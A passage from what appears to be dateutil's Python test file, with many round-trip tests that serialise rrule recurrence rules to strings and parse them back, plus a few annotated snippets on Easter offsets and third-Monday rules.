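                 dtstart=datetime(1997, 9, 2, 9, 0))

# str(rrule) emits a DTSTART line plus an RRULE line, which rrulestr()
# parses back; both rules should generate identical occurrences.
round_tripped = rrulestr(str(original))
```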
def testToStrYearlyInterval(self):
rule = rrule(YEARLY, count=3, interval=2,
dtstart=datetime(1997, 9, 2, 9, 0))
self._rrulestr_reverse_test(rule)
def testToStrYearlyByMonth(self):
self._rrulestr_reverse_test(rrule(YEARLY,
count=3,
bymonth=(1, 3),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrYearlyByMonthDay(self):
self._rrulestr_reverse_test(rrule(YEARLY,
count=3,
bymonthday=(1, 3),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrYearlyByMonthAndMonthDay(self):
self._rrulestr_reverse_test(rrule(YEARLY,
count=3,
bymonth=(1, 3),
bymonthday=(5, 7),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrYearlyByWeekDay(self):
self._rrulestr_reverse_test(rrule(YEARLY,
count=3,
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrYearlyByNWeekDay(self):
self._rrulestr_reverse_test(rrule(YEARLY,
count=3,
byweekday=(TU(1), TH(-1)),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrYearlyByNWeekDayLarge(self):
self._rrulestr_reverse_test(rrule(YEARLY,
count=3,
byweekday=(TU(3), TH(-3)),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrYearlyByMonthAndWeekDay(self):
self._rrulestr_reverse_test(rrule(YEARLY,
count=3,
bymonth=(1, 3),
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrYearlyByMonthAndNWeekDay(self):
self._rrulestr_reverse_test(rrule(YEARLY,
count=3,
bymonth=(1, 3),
byweekday=(TU(1), TH(-1)),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrYearlyByMonthAndNWeekDayLarge(self):
# This is interesting because the TH(-3) ends up before
# the TU(3).
self._rrulestr_reverse_test(rrule(YEARLY,
count=3,
bymonth=(1, 3),
byweekday=(TU(3), TH(-3)),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrYearlyByMonthDayAndWeekDay(self):
self._rrulestr_reverse_test(rrule(YEARLY,
count=3,
bymonthday=(1, 3),
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrYearlyByMonthAndMonthDayAndWeekDay(self):
self._rrulestr_reverse_test(rrule(YEARLY,
count=3,
bymonth=(1, 3),
bymonthday=(1, 3),
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrYearlyByYearDay(self):
self._rrulestr_reverse_test(rrule(YEARLY,
count=4,
byyearday=(1, 100, 200, 365),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrYearlyByYearDayNeg(self):
self._rrulestr_reverse_test(rrule(YEARLY,
count=4,
byyearday=(-365, -266, -166, -1),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrYearlyByMonthAndYearDay(self):
self._rrulestr_reverse_test(rrule(YEARLY,
count=4,
bymonth=(4, 7),
byyearday=(1, 100, 200, 365),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrYearlyByMonthAndYearDayNeg(self):
self._rrulestr_reverse_test(rrule(YEARLY,
count=4,
bymonth=(4, 7),
byyearday=(-365, -266, -166, -1),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrYearlyByWeekNo(self):
self._rrulestr_reverse_test(rrule(YEARLY,
count=3,
byweekno=20,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrYearlyByWeekNoAndWeekDay(self):
# That's a nice one. The first days of week number one
# may be in the previous year.
self._rrulestr_reverse_test(rrule(YEARLY,
count=3,
byweekno=1,
byweekday=MO,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrYearlyByWeekNoAndWeekDayLarge(self):
# Another nice test. The last days of week number 52/53
# may be in the next year.
self._rrulestr_reverse_test(rrule(YEARLY,
count=3,
byweekno=52,
byweekday=SU,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrYearlyByWeekNoAndWeekDayLast(self):
self._rrulestr_reverse_test(rrule(YEARLY,
count=3,
byweekno=-1,
byweekday=SU,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrYearlyByEaster(self):
self._rrulestr_reverse_test(rrule(YEARLY,
count=3,
byeaster=0,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrYearlyByEasterPos(self):
self._rrulestr_reverse_test(rrule(YEARLY,
count=3,
byeaster=1,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrYearlyByEasterNeg(self):
self._rrulestr_reverse_test(rrule(YEARLY,
count=3,
byeaster=-1,
dtstart=datetime(1997, 9, 2, 9, 0)))
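# byeaster, used in the three tests above, is a dateutil extension (not
# part of RFC 5545): an offset in days relative to Easter Sunday, with
# 0 meaning Easter itself.

```python
from datetime import datetime

from dateutil.rrule import rrule, YEARLY

# Western Easter fell on Apr 23 in 2000 and Apr 15 in 2001.
easters = list(rrule(YEARLY, count=2, byeaster=0,
                     dtstart=datetime(2000, 1, 1)))
```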
def testToStrYearlyByWeekNoAndWeekDay53(self):
self._rrulestr_reverse_test(rrule(YEARLY,
count=3,
byweekno=53,
byweekday=MO,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrYearlyByHour(self):
self._rrulestr_reverse_test(rrule(YEARLY,
count=3,
byhour=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrYearlyByMinute(self):
self._rrulestr_reverse_test(rrule(YEARLY,
count=3,
byminute=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrYearlyBySecond(self):
self._rrulestr_reverse_test(rrule(YEARLY,
count=3,
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrYearlyByHourAndMinute(self):
self._rrulestr_reverse_test(rrule(YEARLY,
count=3,
byhour=(6, 18),
byminute=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrYearlyByHourAndSecond(self):
self._rrulestr_reverse_test(rrule(YEARLY,
count=3,
byhour=(6, 18),
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrYearlyByMinuteAndSecond(self):
self._rrulestr_reverse_test(rrule(YEARLY,
count=3,
byminute=(6, 18),
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrYearlyByHourAndMinuteAndSecond(self):
self._rrulestr_reverse_test(rrule(YEARLY,
count=3,
byhour=(6, 18),
byminute=(6, 18),
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrYearlyBySetPos(self):
self._rrulestr_reverse_test(rrule(YEARLY,
count=3,
bymonthday=15,
byhour=(6, 18),
bysetpos=(3, -3),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMonthly(self):
self._rrulestr_reverse_test(rrule(MONTHLY,
count=3,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMonthlyInterval(self):
self._rrulestr_reverse_test(rrule(MONTHLY,
count=3,
interval=2,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMonthlyIntervalLarge(self):
self._rrulestr_reverse_test(rrule(MONTHLY,
count=3,
interval=18,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMonthlyByMonth(self):
self._rrulestr_reverse_test(rrule(MONTHLY,
count=3,
bymonth=(1, 3),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMonthlyByMonthDay(self):
self._rrulestr_reverse_test(rrule(MONTHLY,
count=3,
bymonthday=(1, 3),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMonthlyByMonthAndMonthDay(self):
self._rrulestr_reverse_test(rrule(MONTHLY,
count=3,
bymonth=(1, 3),
bymonthday=(5, 7),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMonthlyByWeekDay(self):
self._rrulestr_reverse_test(rrule(MONTHLY,
count=3,
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0)))
# Third Monday of the month
self.assertEqual(rrule(MONTHLY,
byweekday=MO(+3),
dtstart=datetime(1997, 9, 1)).between(
datetime(1997, 9, 1),
datetime(1997, 12, 1)),
[datetime(1997, 9, 15, 0, 0),
datetime(1997, 10, 20, 0, 0),
datetime(1997, 11, 17, 0, 0)])
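# The "third Monday of the month" pattern asserted above, as a
# standalone snippet: byweekday=MO(+3) selects the third Monday, and
# between() windows the otherwise unbounded rule to a date range.

```python
from datetime import datetime

from dateutil.rrule import rrule, MONTHLY, MO

third_mondays = rrule(MONTHLY, byweekday=MO(+3),
                      dtstart=datetime(1997, 9, 1)).between(
    datetime(1997, 9, 1), datetime(1997, 12, 1))
```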
def testToStrMonthlyByNWeekDay(self):
self._rrulestr_reverse_test(rrule(MONTHLY,
count=3,
byweekday=(TU(1), TH(-1)),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMonthlyByNWeekDayLarge(self):
self._rrulestr_reverse_test(rrule(MONTHLY,
count=3,
byweekday=(TU(3), TH(-3)),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMonthlyByMonthAndWeekDay(self):
self._rrulestr_reverse_test(rrule(MONTHLY,
count=3,
bymonth=(1, 3),
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMonthlyByMonthAndNWeekDay(self):
self._rrulestr_reverse_test(rrule(MONTHLY,
count=3,
bymonth=(1, 3),
byweekday=(TU(1), TH(-1)),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMonthlyByMonthAndNWeekDayLarge(self):
self._rrulestr_reverse_test(rrule(MONTHLY,
count=3,
bymonth=(1, 3),
byweekday=(TU(3), TH(-3)),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMonthlyByMonthDayAndWeekDay(self):
self._rrulestr_reverse_test(rrule(MONTHLY,
count=3,
bymonthday=(1, 3),
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMonthlyByMonthAndMonthDayAndWeekDay(self):
self._rrulestr_reverse_test(rrule(MONTHLY,
count=3,
bymonth=(1, 3),
bymonthday=(1, 3),
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMonthlyByYearDay(self):
self._rrulestr_reverse_test(rrule(MONTHLY,
count=4,
byyearday=(1, 100, 200, 365),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMonthlyByYearDayNeg(self):
self._rrulestr_reverse_test(rrule(MONTHLY,
count=4,
byyearday=(-365, -266, -166, -1),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMonthlyByMonthAndYearDay(self):
self._rrulestr_reverse_test(rrule(MONTHLY,
count=4,
bymonth=(4, 7),
byyearday=(1, 100, 200, 365),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMonthlyByMonthAndYearDayNeg(self):
self._rrulestr_reverse_test(rrule(MONTHLY,
count=4,
bymonth=(4, 7),
byyearday=(-365, -266, -166, -1),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMonthlyByWeekNo(self):
self._rrulestr_reverse_test(rrule(MONTHLY,
count=3,
byweekno=20,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMonthlyByWeekNoAndWeekDay(self):
# That's a nice one. The first days of week number one
# may be in the previous year.
self._rrulestr_reverse_test(rrule(MONTHLY,
count=3,
byweekno=1,
byweekday=MO,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMonthlyByWeekNoAndWeekDayLarge(self):
# Another nice test. The last days of week number 52/53
# may be in the next year.
self._rrulestr_reverse_test(rrule(MONTHLY,
count=3,
byweekno=52,
byweekday=SU,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMonthlyByWeekNoAndWeekDayLast(self):
self._rrulestr_reverse_test(rrule(MONTHLY,
count=3,
byweekno=-1,
byweekday=SU,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMonthlyByWeekNoAndWeekDay53(self):
self._rrulestr_reverse_test(rrule(MONTHLY,
count=3,
byweekno=53,
byweekday=MO,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMonthlyByEaster(self):
self._rrulestr_reverse_test(rrule(MONTHLY,
count=3,
byeaster=0,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMonthlyByEasterPos(self):
self._rrulestr_reverse_test(rrule(MONTHLY,
count=3,
byeaster=1,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMonthlyByEasterNeg(self):
self._rrulestr_reverse_test(rrule(MONTHLY,
count=3,
byeaster=-1,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMonthlyByHour(self):
self._rrulestr_reverse_test(rrule(MONTHLY,
count=3,
byhour=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMonthlyByMinute(self):
self._rrulestr_reverse_test(rrule(MONTHLY,
count=3,
byminute=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMonthlyBySecond(self):
self._rrulestr_reverse_test(rrule(MONTHLY,
count=3,
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMonthlyByHourAndMinute(self):
self._rrulestr_reverse_test(rrule(MONTHLY,
count=3,
byhour=(6, 18),
byminute=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMonthlyByHourAndSecond(self):
self._rrulestr_reverse_test(rrule(MONTHLY,
count=3,
byhour=(6, 18),
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMonthlyByMinuteAndSecond(self):
self._rrulestr_reverse_test(rrule(MONTHLY,
count=3,
byminute=(6, 18),
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMonthlyByHourAndMinuteAndSecond(self):
self._rrulestr_reverse_test(rrule(MONTHLY,
count=3,
byhour=(6, 18),
byminute=(6, 18),
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMonthlyBySetPos(self):
self._rrulestr_reverse_test(rrule(MONTHLY,
count=3,
bymonthday=(13, 17),
byhour=(6, 18),
bysetpos=(3, -3),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrWeekly(self):
self._rrulestr_reverse_test(rrule(WEEKLY,
count=3,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrWeeklyInterval(self):
self._rrulestr_reverse_test(rrule(WEEKLY,
count=3,
interval=2,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrWeeklyIntervalLarge(self):
self._rrulestr_reverse_test(rrule(WEEKLY,
count=3,
interval=20,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrWeeklyByMonth(self):
self._rrulestr_reverse_test(rrule(WEEKLY,
count=3,
bymonth=(1, 3),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrWeeklyByMonthDay(self):
self._rrulestr_reverse_test(rrule(WEEKLY,
count=3,
bymonthday=(1, 3),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrWeeklyByMonthAndMonthDay(self):
self._rrulestr_reverse_test(rrule(WEEKLY,
count=3,
bymonth=(1, 3),
bymonthday=(5, 7),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrWeeklyByWeekDay(self):
self._rrulestr_reverse_test(rrule(WEEKLY,
count=3,
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrWeeklyByNWeekDay(self):
self._rrulestr_reverse_test(rrule(WEEKLY,
count=3,
byweekday=(TU(1), TH(-1)),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrWeeklyByMonthAndWeekDay(self):
# This test is interesting, because it crosses the year
# boundary in a weekly period to find day '1' as a
# valid recurrence.
self._rrulestr_reverse_test(rrule(WEEKLY,
count=3,
bymonth=(1, 3),
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrWeeklyByMonthAndNWeekDay(self):
self._rrulestr_reverse_test(rrule(WEEKLY,
count=3,
bymonth=(1, 3),
byweekday=(TU(1), TH(-1)),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrWeeklyByMonthDayAndWeekDay(self):
self._rrulestr_reverse_test(rrule(WEEKLY,
count=3,
bymonthday=(1, 3),
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrWeeklyByMonthAndMonthDayAndWeekDay(self):
self._rrulestr_reverse_test(rrule(WEEKLY,
count=3,
bymonth=(1, 3),
bymonthday=(1, 3),
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrWeeklyByYearDay(self):
self._rrulestr_reverse_test(rrule(WEEKLY,
count=4,
byyearday=(1, 100, 200, 365),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrWeeklyByYearDayNeg(self):
self._rrulestr_reverse_test(rrule(WEEKLY,
count=4,
byyearday=(-365, -266, -166, -1),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrWeeklyByMonthAndYearDay(self):
self._rrulestr_reverse_test(rrule(WEEKLY,
count=4,
bymonth=(1, 7),
byyearday=(1, 100, 200, 365),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrWeeklyByMonthAndYearDayNeg(self):
self._rrulestr_reverse_test(rrule(WEEKLY,
count=4,
bymonth=(1, 7),
byyearday=(-365, -266, -166, -1),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrWeeklyByWeekNo(self):
self._rrulestr_reverse_test(rrule(WEEKLY,
count=3,
byweekno=20,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrWeeklyByWeekNoAndWeekDay(self):
# That's a nice one. The first days of week number one
# may be in the previous year.
self._rrulestr_reverse_test(rrule(WEEKLY,
count=3,
byweekno=1,
byweekday=MO,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrWeeklyByWeekNoAndWeekDayLarge(self):
# Another nice test. The last days of week number 52/53
# may be in the next year.
self._rrulestr_reverse_test(rrule(WEEKLY,
count=3,
byweekno=52,
byweekday=SU,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrWeeklyByWeekNoAndWeekDayLast(self):
self._rrulestr_reverse_test(rrule(WEEKLY,
count=3,
byweekno=-1,
byweekday=SU,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrWeeklyByWeekNoAndWeekDay53(self):
self._rrulestr_reverse_test(rrule(WEEKLY,
count=3,
byweekno=53,
byweekday=MO,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrWeeklyByEaster(self):
self._rrulestr_reverse_test(rrule(WEEKLY,
count=3,
byeaster=0,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrWeeklyByEasterPos(self):
self._rrulestr_reverse_test(rrule(WEEKLY,
count=3,
byeaster=1,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrWeeklyByEasterNeg(self):
self._rrulestr_reverse_test(rrule(WEEKLY,
count=3,
byeaster=-1,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrWeeklyByHour(self):
self._rrulestr_reverse_test(rrule(WEEKLY,
count=3,
byhour=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrWeeklyByMinute(self):
self._rrulestr_reverse_test(rrule(WEEKLY,
count=3,
byminute=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrWeeklyBySecond(self):
self._rrulestr_reverse_test(rrule(WEEKLY,
count=3,
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrWeeklyByHourAndMinute(self):
self._rrulestr_reverse_test(rrule(WEEKLY,
count=3,
byhour=(6, 18),
byminute=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrWeeklyByHourAndSecond(self):
self._rrulestr_reverse_test(rrule(WEEKLY,
count=3,
byhour=(6, 18),
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrWeeklyByMinuteAndSecond(self):
self._rrulestr_reverse_test(rrule(WEEKLY,
count=3,
byminute=(6, 18),
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrWeeklyByHourAndMinuteAndSecond(self):
self._rrulestr_reverse_test(rrule(WEEKLY,
count=3,
byhour=(6, 18),
byminute=(6, 18),
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrWeeklyBySetPos(self):
self._rrulestr_reverse_test(rrule(WEEKLY,
count=3,
byweekday=(TU, TH),
byhour=(6, 18),
bysetpos=(3, -3),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrDaily(self):
self._rrulestr_reverse_test(rrule(DAILY,
count=3,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrDailyInterval(self):
self._rrulestr_reverse_test(rrule(DAILY,
count=3,
interval=2,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrDailyIntervalLarge(self):
self._rrulestr_reverse_test(rrule(DAILY,
count=3,
interval=92,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrDailyByMonth(self):
self._rrulestr_reverse_test(rrule(DAILY,
count=3,
bymonth=(1, 3),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrDailyByMonthDay(self):
self._rrulestr_reverse_test(rrule(DAILY,
count=3,
bymonthday=(1, 3),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrDailyByMonthAndMonthDay(self):
self._rrulestr_reverse_test(rrule(DAILY,
count=3,
bymonth=(1, 3),
bymonthday=(5, 7),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrDailyByWeekDay(self):
self._rrulestr_reverse_test(rrule(DAILY,
count=3,
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrDailyByNWeekDay(self):
self._rrulestr_reverse_test(rrule(DAILY,
count=3,
byweekday=(TU(1), TH(-1)),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrDailyByMonthAndWeekDay(self):
self._rrulestr_reverse_test(rrule(DAILY,
count=3,
bymonth=(1, 3),
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrDailyByMonthAndNWeekDay(self):
self._rrulestr_reverse_test(rrule(DAILY,
count=3,
bymonth=(1, 3),
byweekday=(TU(1), TH(-1)),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrDailyByMonthDayAndWeekDay(self):
self._rrulestr_reverse_test(rrule(DAILY,
count=3,
bymonthday=(1, 3),
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrDailyByMonthAndMonthDayAndWeekDay(self):
self._rrulestr_reverse_test(rrule(DAILY,
count=3,
bymonth=(1, 3),
bymonthday=(1, 3),
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrDailyByYearDay(self):
self._rrulestr_reverse_test(rrule(DAILY,
count=4,
byyearday=(1, 100, 200, 365),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrDailyByYearDayNeg(self):
self._rrulestr_reverse_test(rrule(DAILY,
count=4,
byyearday=(-365, -266, -166, -1),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrDailyByMonthAndYearDay(self):
self._rrulestr_reverse_test(rrule(DAILY,
count=4,
bymonth=(1, 7),
byyearday=(1, 100, 200, 365),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrDailyByMonthAndYearDayNeg(self):
self._rrulestr_reverse_test(rrule(DAILY,
count=4,
bymonth=(1, 7),
byyearday=(-365, -266, -166, -1),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrDailyByWeekNo(self):
self._rrulestr_reverse_test(rrule(DAILY,
count=3,
byweekno=20,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrDailyByWeekNoAndWeekDay(self):
# That's a nice one. The first days of week number one
# may be in the previous year.
self._rrulestr_reverse_test(rrule(DAILY,
count=3,
byweekno=1,
byweekday=MO,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrDailyByWeekNoAndWeekDayLarge(self):
# Another nice test. The last days of week number 52/53
# may be in the next year.
self._rrulestr_reverse_test(rrule(DAILY,
count=3,
byweekno=52,
byweekday=SU,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrDailyByWeekNoAndWeekDayLast(self):
self._rrulestr_reverse_test(rrule(DAILY,
count=3,
byweekno=-1,
byweekday=SU,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrDailyByWeekNoAndWeekDay53(self):
self._rrulestr_reverse_test(rrule(DAILY,
count=3,
byweekno=53,
byweekday=MO,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrDailyByEaster(self):
self._rrulestr_reverse_test(rrule(DAILY,
count=3,
byeaster=0,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrDailyByEasterPos(self):
self._rrulestr_reverse_test(rrule(DAILY,
count=3,
byeaster=1,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrDailyByEasterNeg(self):
self._rrulestr_reverse_test(rrule(DAILY,
count=3,
byeaster=-1,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrDailyByHour(self):
self._rrulestr_reverse_test(rrule(DAILY,
count=3,
byhour=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrDailyByMinute(self):
self._rrulestr_reverse_test(rrule(DAILY,
count=3,
byminute=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrDailyBySecond(self):
self._rrulestr_reverse_test(rrule(DAILY,
count=3,
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrDailyByHourAndMinute(self):
self._rrulestr_reverse_test(rrule(DAILY,
count=3,
byhour=(6, 18),
byminute=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrDailyByHourAndSecond(self):
self._rrulestr_reverse_test(rrule(DAILY,
count=3,
byhour=(6, 18),
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrDailyByMinuteAndSecond(self):
self._rrulestr_reverse_test(rrule(DAILY,
count=3,
byminute=(6, 18),
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrDailyByHourAndMinuteAndSecond(self):
self._rrulestr_reverse_test(rrule(DAILY,
count=3,
byhour=(6, 18),
byminute=(6, 18),
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrDailyBySetPos(self):
self._rrulestr_reverse_test(rrule(DAILY,
count=3,
byhour=(6, 18),
byminute=(15, 45),
bysetpos=(3, -3),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrHourly(self):
self._rrulestr_reverse_test(rrule(HOURLY,
count=3,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrHourlyInterval(self):
self._rrulestr_reverse_test(rrule(HOURLY,
count=3,
interval=2,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrHourlyIntervalLarge(self):
self._rrulestr_reverse_test(rrule(HOURLY,
count=3,
interval=769,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrHourlyByMonth(self):
self._rrulestr_reverse_test(rrule(HOURLY,
count=3,
bymonth=(1, 3),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrHourlyByMonthDay(self):
self._rrulestr_reverse_test(rrule(HOURLY,
count=3,
bymonthday=(1, 3),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrHourlyByMonthAndMonthDay(self):
self._rrulestr_reverse_test(rrule(HOURLY,
count=3,
bymonth=(1, 3),
bymonthday=(5, 7),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrHourlyByWeekDay(self):
self._rrulestr_reverse_test(rrule(HOURLY,
count=3,
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrHourlyByNWeekDay(self):
self._rrulestr_reverse_test(rrule(HOURLY,
count=3,
byweekday=(TU(1), TH(-1)),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrHourlyByMonthAndWeekDay(self):
self._rrulestr_reverse_test(rrule(HOURLY,
count=3,
bymonth=(1, 3),
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrHourlyByMonthAndNWeekDay(self):
self._rrulestr_reverse_test(rrule(HOURLY,
count=3,
bymonth=(1, 3),
byweekday=(TU(1), TH(-1)),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrHourlyByMonthDayAndWeekDay(self):
self._rrulestr_reverse_test(rrule(HOURLY,
count=3,
bymonthday=(1, 3),
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrHourlyByMonthAndMonthDayAndWeekDay(self):
self._rrulestr_reverse_test(rrule(HOURLY,
count=3,
bymonth=(1, 3),
bymonthday=(1, 3),
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrHourlyByYearDay(self):
self._rrulestr_reverse_test(rrule(HOURLY,
count=4,
byyearday=(1, 100, 200, 365),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrHourlyByYearDayNeg(self):
self._rrulestr_reverse_test(rrule(HOURLY,
count=4,
byyearday=(-365, -266, -166, -1),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrHourlyByMonthAndYearDay(self):
self._rrulestr_reverse_test(rrule(HOURLY,
count=4,
bymonth=(4, 7),
byyearday=(1, 100, 200, 365),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrHourlyByMonthAndYearDayNeg(self):
